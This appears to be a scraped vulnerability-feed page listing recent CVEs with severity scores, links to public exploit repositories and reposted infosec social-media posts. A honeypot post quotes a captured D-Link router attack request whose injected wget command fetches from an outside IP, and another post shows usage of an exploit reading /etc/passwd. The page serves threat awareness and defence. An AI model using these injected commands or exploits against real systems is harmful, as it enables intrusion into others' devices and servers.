https://github.com/xalgord/React2Shell

https://github.com/sudo-Yangziran/CVE-2025-55182POC

https://github.com/sho-luv/React2Shell

https://github.com/BeichenDream/CVE-2025-55182-GodzillaMemoryShell

https://github.com/anuththara2007-W/CVE-2025-55182-Exploit-extension

https://github.com/theman001/CVE-2025-55182

https://github.com/hidden-investigations/react2shell-scanner

https://github.com/MrR0b0t19/CVE-2025-55182-shellinteractive

https://github.com/SainiONHacks/CVE-2025-55182-Scanner

https://github.com/shyambhanushali/React2Shell

https://github.com/Cr4at0r/Next.js-RCE-Scanner-BurpSuite-Extension-

https://github.com/alfazhossain/CVE-2025-55182-Exploiter

https://github.com/santihabib/CVE-2025-55182-analysis

https://github.com/zr0n/react2shell

https://github.com/ejpir/CVE-2025-55182-research

https://github.com/shamo0/react2shell-PoC

https://github.com/GelukCrab/React-Server-Components-RCE

https://github.com/hualy13/CVE-2025-55182

https://github.com/onlylovetx/CVE-2025-55182-CVE-2025-66478-Exploit-GUI

CVE-2025-12480
(9.1 CRITICAL)

EPSS: 75.25%

updated 2025-11-14T02:00:02.350000

1 posts

Triofox versions prior to 16.7.10368.56560, are vulnerable to an Improper Access Control flaw that allows access to initial setup pages even after setup is complete.

Nuclei template

catc0n@infosec.exchange at 2026-01-23T19:48:15.000Z ##

Join @vulncheck next week for our new In the Wild webcast series! This month, our research team will do a deep dive on developing an exploit for Gladinet Triofox CVE-2025-12480, a process that wound up being significantly more complex than expected.

Wednesday, Jan. 28 @ 1 PM ET (and the last Wednesday of every month!)

wwv.vulncheck.com/in-the-wild-

##

CVE-2025-12556
(8.8 HIGH)

EPSS: 0.11%

updated 2025-11-06T18:32:50

2 posts

An argument injection vulnerability exists in the affected product that could allow an attacker to execute arbitrary code within the context of the host machine.

cyberveille@mastobot.ping.moi at 2026-01-27T18:30:04.000Z ##

πŸ“’ CVE-2025-12556 : exΓ©cution de code en Β« 1 clic Β» dans IDIS Cloud Manager Viewer (Windows)
πŸ“ Selon Team82, une faille critique dans IDIS Cloud Manager Viewer (ICM) permet une exΓ©cut...
πŸ“– cyberveille : cyberveille.ch/posts/2026-01-2
🌐 source : claroty.com/team82/research/ne
#CVE_2025_12556 #IDIS_Cloud_Manager #Cyberveille

##

cyberveille@mastobot.ping.moi at 2026-01-27T18:30:04.000Z ##

πŸ“’ CVE-2025-12556 : exΓ©cution de code en Β« 1 clic Β» dans IDIS Cloud Manager Viewer (Windows)
πŸ“ Selon Team82, une faille critique dans IDIS Cloud Manager Viewer (ICM) permet une exΓ©cut...
πŸ“– cyberveille : cyberveille.ch/posts/2026-01-2
🌐 source : claroty.com/team82/research/ne
#CVE_2025_12556 #IDIS_Cloud_Manager #Cyberveille

##

CVE-2025-41244
(7.8 HIGH)

EPSS: 0.92%

updated 2025-11-06T13:58:13.620000

1 posts

VMware Aria Operations and VMware Tools contain a local privilege escalation vulnerability.Β A malicious local actor with non-administrative privileges having access to a VM with VMware ToolsΒ installed and managed by Aria Operations with SDMP enabled may exploit this vulnerability to escalate privileges to root on the same VM.

3 repos

https://github.com/haspiranti/CVE-2025-41244-PoC

https://github.com/rxerium/CVE-2025-41244

https://github.com/NULL200OK/CVE-2025-41244

AAKL@infosec.exchange at 2026-01-26T16:53:48.000Z ##

New. This addresses CVE-2025-48384 and CVE-2025-41244.

Dell Security Update for CloudBoost Virtual Appliance Multiple Vulnerabilities dell.com/support/kbdoc/en-us/0 #Dell #infosec #vulnerability

##

CVE-2023-26819
(2.9 LOW)

EPSS: 0.04%

updated 2025-11-03T20:16:00.937000

1 posts

cJSON 1.7.15 might allow a denial of service via a crafted JSON document such as {"a": true, "b": [ null,9999999999999999999999999999999999999999999999912345678901234567]}.

linux@activitypub.awakari.com at 2026-01-26T08:27:15.000Z ## Ubuntu 25.10 cJSON Important DoS Memory Access Vuln 7973-1 CVE-2023-26819 Several security issues were fixed in cJSON.

#Ubuntu #Linux #Distribution #- #Security #Advisories

Origin | Interest | Match ##

CVE-2025-34164(CVSS UNKNOWN)

EPSS: 0.30%

updated 2025-11-03T18:32:42

2 posts

A heap-based buffer overflow vulnerability in NetSupport ManagerΒ 14.x versions prior to 14.12.0000 allows a remote, unauthenticated attacker to cause a denial of service (DoS) or potentially result in arbitrary code execution.

1 repos

#search_error

beyondmachines1@infosec.exchange at 2026-01-27T10:01:02.000Z ##

NetSupport Manager Zero-Day Flaws Enable Unauthenticated Remote Code Execution

NetSupport Manager versions prior to 14.12.0000 contain two critical vulnerabilities (CVE-2025-34164 and CVE-2025-34165) that allow unauthenticated remote code execution via an undocumented broadcast feature. Attackers can exploit these flaws to bypass security protections and gain full control over affected systems.

**Make sure your NetSupport Manager port is limited and access to port TCP 5405 is blocked or strictly isolated. Then plan an update to version 14.12.0000.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

codewhitesec@infosec.exchange at 2026-01-23T12:28:24.000Z ##

You like technical deep dives into binary exploitation and crazy heap wizardry? Then you'll like our blog post about unauth'ed RCE in NetSupport Manager aka CVE-2025-34164 & CVE-2025-34165 code-white.com/blog/2026-01-ns

##

CVE-2025-8088
(8.8 HIGH)

EPSS: 2.94%

updated 2025-10-22T00:34:26

7 posts

A path traversal vulnerability affecting the Windows version of WinRAR allows the attackers to execute arbitrary code by crafting malicious archive files. This vulnerability was exploited in the wild and was discovered by Anton Cherepanov, Peter KoőinÑr, and Peter Strýček from ESET.

27 repos

https://github.com/xi0onamdev/WinRAR-CVE-2025-8088-Exploitation-Toolkit

https://github.com/pentestfunctions/best-CVE-2025-8088

https://github.com/ghostn4444/CVE-2025-8088

https://github.com/Ashwesker/Ashwesker-CVE-2025-8088

https://github.com/DeepBlue-dot/CVE-2025-8088-WinRAR-Startup-PoC

https://github.com/nhattanhh/CVE-2025-8088

https://github.com/sxyrxyy/CVE-2025-8088-WinRAR-Proof-of-Concept-PoC-Exploit-

https://github.com/techcorp/CVE-2025-8088-Exploit

https://github.com/nuky-alt/CVE-2025-8088

https://github.com/Markusino488/cve-2025-8088

https://github.com/hbesljx/CVE-2025-8088-EXP

https://github.com/0xAbolfazl/CVE-2025-8088-WinRAR-PathTraversal-PoC

https://github.com/AdityaBhatt3010/CVE-2025-8088-WinRAR-Zero-Day-Path-Traversal

https://github.com/walidpyh/CVE-2025-8088

https://github.com/papcaii2004/CVE-2025-8088-WinRAR-builder

https://github.com/Shinkirou789/Cve-2025-8088-WinRar-vulnerability

https://github.com/lucyna77/winrar-exploit

https://github.com/knight0x07/WinRAR-CVE-2025-8088-PoC-RAR

https://github.com/ilhamrzr/RAR-Anomaly-Inspector

https://github.com/jordan922/CVE-2025-8088

https://github.com/travisbgreen/cve-2025-8088

https://github.com/hexsecteam/CVE-2025-8088-Winrar-Tool

https://github.com/pentestfunctions/CVE-2025-8088-Multi-Document

https://github.com/pexlexity/WinRAR-CVE-2025-8088-Path-Traversal-PoC

https://github.com/onlytoxi/CVE-2025-8088-Winrar-Tool

https://github.com/pescada-dev/-CVE-2025-8088

https://github.com/kitsuneshade/WinRAR-Exploit-Tool---Rust-Edition

undercodenews@mastodon.social at 2026-01-27T19:56:32.000Z ##

WinRAR Under Siege: High-Severity CVE-2025-8088 Exploit Abused by State-Sponsored and Cybercriminal Actors

A critical WinRAR vulnerability, CVE-2025-8088, is currently being exploited by multiple threat actors worldwide, spanning both state-sponsored espionage groups and financially motivated cybercriminals. This flaw, which enables path traversal via Alternate Data Streams (ADS), allows attackers to stealthily drop malicious files in arbitrary system locations.…

undercodenews.com/winrar-under

##

defendopsdiaries at 2026-01-27T19:51:48.956Z ##

Hackers are using a single booby-trapped archive file to sneak malware past security tools and hide it where you would never think to look. Here is how the WinRAR flaw is letting them get away with it

thedefendopsdiaries.com/how-at

##

oversecurity@mastodon.social at 2026-01-27T19:50:06.000Z ##

WinRAR path traversal flaw still exploited by numerous hackers

Multiple threat actors, both state-sponsored and financially motivated, are exploiting the CVE-2025-8088 high-severity vulnerability in WinRAR for...

πŸ”—οΈ [Bleepingcomputer] link.is.it/dx1ikK

##

AAKL at 2026-01-27T16:46:03.365Z ##

New. Self-promotion goes without saying, never mind the all-invasive Gmail AI.

πŸ˜‚ "We also recommend the use of Google Safe Browsing and Gmail, which actively identifies and blocks files containing the exploit."

Google Threat Intelligence Group: Diverse Threat Actors Exploiting Critical WinRAR Vulnerability CVE-2025-8088 cloud.google.com/blog/topics/t

##

defendopsdiaries@infosec.exchange at 2026-01-27T19:51:48.000Z ##

Hackers are using a single booby-trapped archive file to sneak malware past security tools and hide it where you would never think to look. Here is how the WinRAR flaw is letting them get away with it

thedefendopsdiaries.com/how-at

##

oversecurity@mastodon.social at 2026-01-27T19:50:06.000Z ##

WinRAR path traversal flaw still exploited by numerous hackers

Multiple threat actors, both state-sponsored and financially motivated, are exploiting the CVE-2025-8088 high-severity vulnerability in WinRAR for...

πŸ”—οΈ [Bleepingcomputer] link.is.it/dx1ikK

##

AAKL@infosec.exchange at 2026-01-27T16:46:03.000Z ##

New. Self-promotion goes without saying, never mind the all-invasive Gmail AI.

πŸ˜‚ "We also recommend the use of Google Safe Browsing and Gmail, which actively identifies and blocks files containing the exploit."

Google Threat Intelligence Group: Diverse Threat Actors Exploiting Critical WinRAR Vulnerability CVE-2025-8088 cloud.google.com/blog/topics/t #Google #windows #Microsoft #threatintel #threatintelligence

##

CVE-2021-35394
(9.8 CRITICAL)

EPSS: 94.22%

updated 2025-10-22T00:33:23

1 posts

Realtek Jungle SDK version v2.x up to v3.4.14B provides a diagnostic tool called 'MP Daemon' that is usually compiled as 'UDPServer' binary. The binary is affected by multiple memory corruption vulnerabilities and an arbitrary command injection vulnerability that can be exploited by remote unauthenticated attackers.

Nuclei template

hrbrmstr@mastodon.social at 2026-01-24T13:16:28.000Z ##

185.93.89.75 was a busy bee today! Attempting Realtek Jungle SDK formWsc Injection aimed mostly @ the U.S.

That SDK is used in RTL819x series chipsets (RTL819xD and related) that provide wireless capabilities for a broad range of IoT devices. Based on the ONEKEY/IoT Inspector research that disclosed CVE-2021-35394 and related vulnerabilities.

Wonder what mischief they're up to?

##

CVE-2019-17621
(9.8 CRITICAL)

EPSS: 93.30%

updated 2025-10-22T00:31:50

1 posts

The UPnP endpoint URL /gena.cgi in the D-Link DIR-859 Wi-Fi router 1.05 and 1.06B01 Beta01 allows an Unauthenticated remote attacker to execute system commands as root, by sending a specially crafted HTTP SUBSCRIBE request to the UPnP service when connecting to the local network.

2 repos

https://github.com/s1kr10s/D-Link-DIR-859-RCE

https://github.com/Squirre17/CVE-2019-17621

heinen@infosec.exchange at 2026-01-26T12:47:38.000Z ##

Suddenly seeing exploitation attempts of CVE-2019-17621 (D-Link DIR-859 Wi-Fi router RCE). In 3 years of running my Lophiid honeypots, this is the first time I see this specific vuln being exploited.

An example request:

SUBSCRIBE /gena.cgi?service=`echo ; wget http://185.93.89.75/81_CAJ0BIC0CCF0BJA_CVE-2019-17621 -O /dev/null; echo >` HTTP/1.1
Host: x.x.x.x
Callback: <http://192.168.0.2:1337/ServiceProxy0>
Connection: close
Nt: upnp:event
Timeout: Second-1800
User-Agent: Mozilla/1.0

#honeypot #dfir #infosec #cybersecurity #threatintel

##

CVE-2025-34165(CVSS UNKNOWN)

EPSS: 0.25%

updated 2025-08-30T00:30:35

2 posts

A stack-based buffer overflow vulnerability in NetSupport ManagerΒ 14.x versions prior to 14.12.0000 allows a remote, unauthenticated attacker to cause a denial of service (DoS) or potentially leak a limited amount of memory.

1 repos

#search_error

beyondmachines1@infosec.exchange at 2026-01-27T10:01:02.000Z ##

NetSupport Manager Zero-Day Flaws Enable Unauthenticated Remote Code Execution

NetSupport Manager versions prior to 14.12.0000 contain two critical vulnerabilities (CVE-2025-34164 and CVE-2025-34165) that allow unauthenticated remote code execution via an undocumented broadcast feature. Attackers can exploit these flaws to bypass security protections and gain full control over affected systems.

**Make sure your NetSupport Manager port is limited and access to port TCP 5405 is blocked or strictly isolated. Then plan an update to version 14.12.0000.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

codewhitesec@infosec.exchange at 2026-01-23T12:28:24.000Z ##

You like technical deep dives into binary exploitation and crazy heap wizardry? Then you'll like our blog post about unauth'ed RCE in NetSupport Manager aka CVE-2025-34164 & CVE-2025-34165 code-white.com/blog/2026-01-ns

##

CVE-2024-37081
(7.8 HIGH)

EPSS: 49.73%

updated 2025-06-20T19:08:08.187000

1 posts

The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo.Β An authenticated local user with non-administrative privileges may exploit these issues to elevate privileges to root on vCenter Server Appliance.

4 repos

https://github.com/mbadanoiu/CVE-2024-37081

https://github.com/CERTologists/-CVE-2024-37081-POC

https://github.com/Mr-r00t11/CVE-2024-37081

https://github.com/CERTologists/Modified-CVE-2024-37081-POC

agowa338@chaos.social at 2026-01-26T08:45:26.000Z ##

As it is public now* I'm able to talk about it.

Check your VMware infrastructure. CVE-2024-37079 is known to have been exploited in the wild.

> UPDATE: Broadcom has information to suggest that exploitation of CVE-2024-37079 has occurred in the wild.

euvd.enisa.europa.eu/vulnerabi
euvd.enisa.europa.eu/vulnerabi
euvd.enisa.europa.eu/vulnerabi

support.broadcom.com/web/ecx/s

#infosec #itsec #itsecurity

* technically since Friday.

##

CVE-2007-0882(CVSS UNKNOWN)

EPSS: 90.96%

updated 2025-04-09T03:38:26

1 posts

Argument injection vulnerability in the telnet daemon (in.telnetd) in Solaris 10 and 11 (SunOS 5.10 and 5.11) misinterprets certain client "-f" sequences as valid requests for the login program to skip authentication, which allows remote attackers to log into certain accounts, as demonstrated by the bin account.

ela@infosec.exchange at 2026-01-24T08:21:34.000Z ##

OMG. -froot bug resurfaced. seclists.org/oss-sec/2026/q1/89

I see the headlines, "10 years old bug".

My friends, this bug is older. Much older. Not this particular instance, but it is a classical mistake to make. It's a command line injection when calling the login executable.

Some people point to CVE-2007-0882. Solaris had that, almost 20 years ago.

But it's even older than that. It's so old it predates the CVE system. I don't remember exact dates, but we popped Linux and AIX boxes with that, mid 90s.

But it is *even older* than that. Have a look at System V R4, Β©1990, getty calling login with unsanitized input:

github.com/calmsacibis995/svr4

But how deep does the rabbit hole go? When was this bug introduced?

Getty called login with user input since the dawn of time (UNIX V2, 1972):

tuhs.org/cgi-bin/utree.pl?file

But this predates command line arguments in login:

tuhs.org/cgi-bin/utree.pl?file

So, when did this particular command line feature of login appear?

In the BSD universe, -f was introduced with POSIX compatibilitiy in 4.3BSD-Reno:

tuhs.org/cgi-bin/utree.pl?file

But someone paid attention and filtered out user names starting with - in getty:

tuhs.org/cgi-bin/utree.pl?file

RCS timestamp says 6/29/1990, so same age as SysV R4.

The original 4.3BSD (1986) doesn't filter the user name:

tuhs.org/cgi-bin/utree.pl?file

And it does have a -r option in login:

tuhs.org/cgi-bin/utree.pl?file

Exploitable? No idea, argv processing might be a problem. I'll find out another day.

In conclusion: bug existed since 1990, it's so easy to make when implementing POSIX that it keeps resurfacing, and at least one person in Berkeley knew since day 0.

##

CVE-2025-2294
(9.8 CRITICAL)

EPSS: 54.35%

updated 2025-03-28T06:30:37

2 posts

The Kubio AI Page Builder plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.5.1 via thekubio_hybrid_theme_load_template function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitiv

Nuclei template

9 repos

https://github.com/iteride/CVE-2025-2294

https://github.com/romanedutov/CVE-2025-2294

https://github.com/0xWhoami35/CVE-2025-2294

https://github.com/mrrivaldo/CVE-2025-2294

https://github.com/r0otk3r/CVE-2025-2294

https://github.com/Yucaerin/CVE-2025-2294

https://github.com/rhz0d/CVE-2025-2294

https://github.com/Nxploited/CVE-2025-2294

https://github.com/fumioryoto/CVE-2025-2294-Kubio-2.5.1-LFi-Checker

DarkWebInformer at 2026-01-27T20:16:05.540Z ##

‼️ CVE-2025-2294: Kubio AI Page Builder <= 2.5.1 - Unauthenticated Local File Inclusion

GitHub: github.com/fumioryoto/CVE-2025

CVSS: 9.8

Usage:

usage: exploit.py [-h] -u URL [-f FILE]

options:
-h, --help show this help message and exit
-u URL, --url URL Target base URL (e.g., example.com)
-f FILE, --file FILE File to read (default: /etc/passwd)

Example:

python3 exploit.py -u example.com -f /etc/passwd

##

DarkWebInformer@infosec.exchange at 2026-01-27T20:16:05.000Z ##

‼️ CVE-2025-2294: Kubio AI Page Builder <= 2.5.1 - Unauthenticated Local File Inclusion

GitHub: github.com/fumioryoto/CVE-2025

CVSS: 9.8

Usage:

usage: exploit.py [-h] -u URL [-f FILE]

options:
-h, --help show this help message and exit
-u URL, --url URL Target base URL (e.g., example.com)
-f FILE, --file FILE File to read (default: /etc/passwd)

Example:

python3 exploit.py -u example.com -f /etc/passwd

##

CVE-2024-37080
(9.8 CRITICAL)

EPSS: 36.73%

updated 2025-03-13T15:33:36

1 posts

vCenter Server contains a heap-overflow vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may trigger this vulnerability by sending a specially crafted network packet potentially leading to remote code execution.

agowa338@chaos.social at 2026-01-26T08:45:26.000Z ##

As it is public now* I'm able to talk about it.

Check your VMware infrastructure. CVE-2024-37079 is known to have been exploited in the wild.

> UPDATE: Broadcom has information to suggest that exploitation of CVE-2024-37079 has occurred in the wild.

euvd.enisa.europa.eu/vulnerabi
euvd.enisa.europa.eu/vulnerabi
euvd.enisa.europa.eu/vulnerabi

support.broadcom.com/web/ecx/s

#infosec #itsec #itsecurity

* technically since Friday.

##

CVE-2020-15250
(4.4 MEDIUM)

EPSS: 0.02%

updated 2024-11-21T05:05:11.403000

1 posts

In JUnit4 from version 4.7 and before 4.13.1, the test rule TemporaryFolder contains a local information disclosure vulnerability. On Unix like systems, the system's temporary directory is shared between all users on that system. Because of this, when files and directories are written into this directory they are, by default, readable by other users on that same system. This vulnerability does not

bitbonk@mastodon.social at 2026-01-23T19:21:57.000Z ##

@bradwilson @xunit well well, just because we are not running something in production doesn’t mean it can’t have vulnerablilities 😊😈

nvd.nist.gov/vuln/detail/cve-2

##

CVE-2026-24770
(0 None)

EPSS: 0.00%

2 posts

N/A

thehackerwire@mastodon.social at 2026-01-27T23:02:26.000Z ##

πŸ”΄ CVE-2026-24770 - Critical (9.8)

RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine. In version 0.23.1 and possibly earlier versions, the MinerU parser contains a "Zip Slip" vulnerability, allowing an attacker to overwrite arbitrary files on the server (leading...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T23:02:26.000Z ##

πŸ”΄ CVE-2026-24770 - Critical (9.8)

RAGFlow is an open-source RAG (Retrieval-Augmented Generation) engine. In version 0.23.1 and possibly earlier versions, the MinerU parser contains a "Zip Slip" vulnerability, allowing an attacker to overwrite arbitrary files on the server (leading...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24741
(0 None)

EPSS: 0.00%

2 posts

N/A

thehackerwire@mastodon.social at 2026-01-27T23:01:12.000Z ##

🟠 CVE-2026-24741 - High (8.1)

ConvertXis a self-hosted online file converter. In versions prior to 0.17.0, the `POST /delete` endpoint uses a user-controlled `filename` value to construct a filesystem path and deletes it via `unlink` without sufficient validation. By supplying...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T23:01:12.000Z ##

🟠 CVE-2026-24741 - High (8.1)

ConvertXis a self-hosted online file converter. In versions prior to 0.17.0, the `POST /delete` endpoint uses a user-controlled `filename` value to construct a filesystem path and deletes it via `unlink` without sufficient validation. By supplying...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24783
(0 None)

EPSS: 0.00%

2 posts

N/A

thehackerwire@mastodon.social at 2026-01-27T23:01:01.000Z ##

🟠 CVE-2026-24783 - High (7.5)

soroban-fixed-point-math is a fixed-point math library for Soroban smart contacts. In versions 1.3.0 and 1.4.0, the `mulDiv(x, y, z)` function incorrectly handled cases where both the intermediate product $x * y$ and the divisor $z$ were negative....

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T23:01:01.000Z ##

🟠 CVE-2026-24783 - High (7.5)

soroban-fixed-point-math is a fixed-point math library for Soroban smart contacts. In versions 1.3.0 and 1.4.0, the `mulDiv(x, y, z)` function incorrectly handled cases where both the intermediate product $x * y$ and the divisor $z$ were negative....

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24736
(0 None)

EPSS: 0.00%

4 posts

N/A

thehackerwire@mastodon.social at 2026-01-27T21:53:22.000Z ##

πŸ”΄ CVE-2026-24736 - Critical (9.1)

Squidex is an open source headless content management system and content management hub. Versions of the application up to and including 7.21.0 allow users to define "Webhooks" as actions within the Rules engine. The url parameter in the webhook c...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T21:51:45.000Z ##

πŸ”΄ CVE-2026-24736 - Critical (9.1)

Squidex is an open source headless content management system and content management hub. Versions of the application up to and including 7.21.0 allow users to define "Webhooks" as actions within the Rules engine. The url parameter in the webhook c...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T21:53:22.000Z ##

πŸ”΄ CVE-2026-24736 - Critical (9.1)

Squidex is an open source headless content management system and content management hub. Versions of the application up to and including 7.21.0 allow users to define "Webhooks" as actions within the Rules engine. The url parameter in the webhook c...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T21:51:45.000Z ##

πŸ”΄ CVE-2026-24736 - Critical (9.1)

Squidex is an open source headless content management system and content management hub. Versions of the application up to and including 7.21.0 allow users to define "Webhooks" as actions within the Rules engine. The url parameter in the webhook c...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-22794
(0 None)

EPSS: 0.03%

2 posts

N/A

1 repos

https://github.com/MalikHamza7/CVE-2026-22794-POC

CVE-2026-22259
(0 None)

EPSS: 0.00%

2 posts

N/A

thehackerwire@mastodon.social at 2026-01-27T18:01:02.000Z ##

🟠 CVE-2026-22259 - High (7.5)

Suricata is a network IDS, IPS and NSM engine. Prior to versions 8.0.3 and 7.0.14, specially crafted traffic can cause Suricata to consume large amounts of memory while parsing DNP3 traffic. This can lead to the process slowing down and running ou...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T18:01:02.000Z ##

🟠 CVE-2026-22259 - High (7.5)

Suricata is a network IDS, IPS and NSM engine. Prior to versions 8.0.3 and 7.0.14, specially crafted traffic can cause Suricata to consume large amounts of memory while parsing DNP3 traffic. This can lead to the process slowing down and running ou...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-22258
(0 None)

EPSS: 0.00%

2 posts

N/A

thehackerwire@mastodon.social at 2026-01-27T18:00:52.000Z ##

🟠 CVE-2026-22258 - High (7.5)

Suricata is a network IDS, IPS and NSM engine. Prior to versions 8.0.3 and 7.0.14, crafted DCERPC traffic can cause Suricata to expand a buffer w/o limits, leading to memory exhaustion and the process getting killed. While reported for DCERPC over...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T18:00:52.000Z ##

🟠 CVE-2026-22258 - High (7.5)

Suricata is a network IDS, IPS and NSM engine. Prior to versions 8.0.3 and 7.0.14, crafted DCERPC traffic can cause Suricata to expand a buffer w/o limits, leading to memory exhaustion and the process getting killed. While reported for DCERPC over...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-0648
(0 None)

EPSS: 0.00%

2 posts

N/A

thehackerwire@mastodon.social at 2026-01-27T16:44:53.000Z ##

🟠 CVE-2026-0648 - High (7.8)

The vulnerability stems from an incorrect error-checking logic in the CreateCounter() function (in threadx/utility/rtos_compatibility_layers/OSEK/tx_osek.c) when handling the return value of osek_get_counter(). Specifically, the current code chec...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T16:44:53.000Z ##

🟠 CVE-2026-0648 - High (7.8)

The vulnerability stems from an incorrect error-checking logic in the CreateCounter() function (in threadx/utility/rtos_compatibility_layers/OSEK/tx_osek.c) when handling the return value of osek_get_counter(). Specifically, the current code chec...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24002
(0 None)

EPSS: 0.05%

2 posts

N/A

beyondmachines1 at 2026-01-27T16:01:03.190Z ##

Critical Cellbreak Vulnerability in Grist-Core Enables Remote Code Execution

Grist-Core patched a critical vulnerability (CVE-2026-24002) that allows attackers to execute remote code via malicious spreadsheet formulas. The flaw enables unauthorized access to host systems, database credentials, and sensitive internal files.

**If you're running Grist-Core, immediately update to version 1.7.9 to fix this flaw. There's a PoC available, so exploits will start VERY SOON. If you can't update right away, change your GRIST_SANDBOX_FLAVOR setting to "gvisor" as an interim protection measure.**

beyondmachines.net/event_detai

##

beyondmachines1@infosec.exchange at 2026-01-27T16:01:03.000Z ##

Critical Cellbreak Vulnerability in Grist-Core Enables Remote Code Execution

Grist-Core patched a critical vulnerability (CVE-2026-24002) that allows attackers to execute remote code via malicious spreadsheet formulas. The flaw enables unauthorized access to host systems, database credentials, and sensitive internal files.

**If you're running Grist-Core, immediately update to version 1.7.9 to fix this flaw. There's a PoC available, so exploits will start VERY SOON. If you can't update right away, change your GRIST_SANDBOX_FLAVOR setting to "gvisor" as an interim protection measure.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2026-23864
(0 None)

EPSS: 0.60%

2 posts

N/A

1 repos

#search_error

thehackerwire@mastodon.social at 2026-01-26T22:00:00.000Z ##

🟠 CVE-2026-23864 - High (7.5)

Multiple denial of service vulnerabilities exist in React Server Components, affecting the following packages: react-server-dom-parcel, react-server-dom-turbopack, react-server-dom-webpack.

The vulnerabilities are triggered by sending specially c...

πŸ”— thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

jviide@infosec.exchange at 2026-01-26T19:57:40.000Z ##

New React.js patches released today for CVE-2026-23864. Fixes for DoS issues reported by several people, including Yours Truly πŸ™‚

The blog post at react.dev/blog/2025/12/11/deni has been updated with the new info. #react

##

CVE-2025-48384
(0 None)

EPSS: 0.33%

2 posts

N/A

44 repos

https://github.com/s41r4j/CVE-2025-48384-submodule

https://github.com/p1026/CVE-2025-48384

https://github.com/kallydev/cve-2025-48384-hook

https://github.com/fishyyh/CVE-2025-48384

https://github.com/elprogramadorgt/CVE-2025-48384

https://github.com/vignesh21-git/CVE-2025-48384

https://github.com/EdwardYeIntrix/CVE-2025-48384-Scanner

https://github.com/IK-20211125/CVE-2025-48384

https://github.com/beishanxueyuan/CVE-2025-48384

https://github.com/jacobholtz/CVE-2025-48384-poc

https://github.com/vinieger/vinieger-CVE-2025-48384-Dockerfile

https://github.com/altm4n/cve-2025-48384

https://github.com/liamg/CVE-2025-48384

https://github.com/jacobholtz/CVE-2025-48384-submodule

https://github.com/liamg/CVE-2025-48384-submodule

https://github.com/arun1033/CVE-2025-48384

https://github.com/simplyfurious/CVE-2025-48384-submodule_test

https://github.com/ECHO6789/CVE-2025-48384-submodule

https://github.com/mukesh-610/cve-2025-48384

https://github.com/f1shh/CVE-2025-48384

https://github.com/beishanxueyuan/CVE-2025-48384-test

https://github.com/fluoworite/CVE-2025-48384-sub

https://github.com/replicatorbot/CVE-2025-48384-POC

https://github.com/Anezatraa/CVE-2025-48384-submodule

https://github.com/greatyy/CVE-2025-48384-p

https://github.com/s41r4j/CVE-2025-48384

https://github.com/testdjshan/CVE-2025-48384

https://github.com/replicatorbot/CVE-2025-48384

https://github.com/mukesh-610/cve-2025-48384-exploit

https://github.com/fluoworite/CVE-2025-48384

https://github.com/fishyyh/CVE-2025-48384-POC

https://github.com/vignesh21-git/CVE-2025-48384-submodule

https://github.com/eliox01/CVE-2025-48384

https://github.com/acheong08/CVE-2025-48384

https://github.com/zr0n/CVE-2025-48384-sub

https://github.com/MarcoTondolo/cve-2025-48384-poc

https://github.com/butyraldehyde/CVE-2025-48384-PoC-Part2

https://github.com/admin-ping/CVE-2025-48384-RCE

https://github.com/ppd520/CVE-2025-48384

https://github.com/altm4n/cve-2025-48384-hub

https://github.com/NigelX/CVE-2025-48384

https://github.com/butyraldehyde/CVE-2025-48384-PoC

https://github.com/zr0n/CVE-2025-48384-main

https://github.com/nguyentranbaotran/cve-2025-48384-poc

AAKL@infosec.exchange at 2026-01-26T16:53:48.000Z ##

New. This addresses CVE-2025-48384 and CVE-2025-41244.

Dell Security Update for CloudBoost Virtual Appliance Multiple Vulnerabilities dell.com/support/kbdoc/en-us/0 #Dell #infosec #vulnerability

##

